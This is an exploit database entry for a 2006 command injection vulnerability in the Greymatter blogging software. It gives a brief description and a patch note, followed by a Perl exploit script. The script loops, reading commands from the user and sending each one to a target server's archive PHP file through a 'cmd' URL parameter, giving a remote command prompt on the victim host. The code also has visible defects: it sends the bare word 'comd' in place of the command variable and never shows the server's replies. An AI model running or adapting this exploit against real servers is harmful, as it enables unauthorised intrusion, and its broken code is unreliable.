Greymatter Exploit

vendor:

Greymatter

by:

Hessam-x

7,5

CVSS

HIGH

Command Injection

CWE

Product Name: Greymatter

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

This exploit allows an attacker to execute arbitrary commands on the vulnerable server by exploiting a command injection vulnerability in Greymatter. The attacker can send a malicious HTTP request to the vulnerable server with a crafted command in the 'cmd' parameter of the URL. The attacker can then execute arbitrary commands on the vulnerable server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of Greymatter.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Exploit by Hessam-x (www.hessamx.net)
# Special Thanx : Vampire , s3rv3r_hack3r
######################################################
#  ___ ___                __                         #
# /   |   \_____    ____ |  | __ ___________________ #
#/    ~    \__  \ _/ ___\|  |/ // __ \_  __ \___   / #
#\    Y    // __ \\  \___|    <\  ___/|  | \//    /  #
# \___|_  /(____  )\___  >__|_ \\___  >__|  /_____ \ #
#       \/      \/     \/     \/    \/            \/ #
#             Iran Hackerz Security Team             #
#               WebSite: www.hackerz.ir              #
#                 DeltaHAcking Team                  #
#           website: www.deltahacking.com            #
######################################################
# Name    : Greymatter                               #
# Site    : http://www.noahgrey.com/greysoft/        #
######################################################
# example:
# target : www.yesite.com/Greymatter/
# archive number : 00000141
use LWP::Simple;


print "-------------------------------------------\n";
print "=                 Greymatter              =\n";
print "=       By Hessam-x  - www.hackerz.ir     =\n";
print "=   Vampire      - www.deltahacking.com   =\n"; 
print "-------------------------------------------\n\n";


      print "Target >http://";
      chomp($targ = <STDIN>);
      print "archive number >";
      chomp($arnum= <STDIN>);
   
   $con=get("http://".$targ) || die "[-]Cannot connect to Host"; 
while ()  
{  
     print "Hessam-x@Greymatter \$";
     chomp($comd=<STDIN>);
     $commd=get("http://".$targ."archives/".$arnum.".php?cmd=".comd)
}

# milw0rm.com [2006-03-28]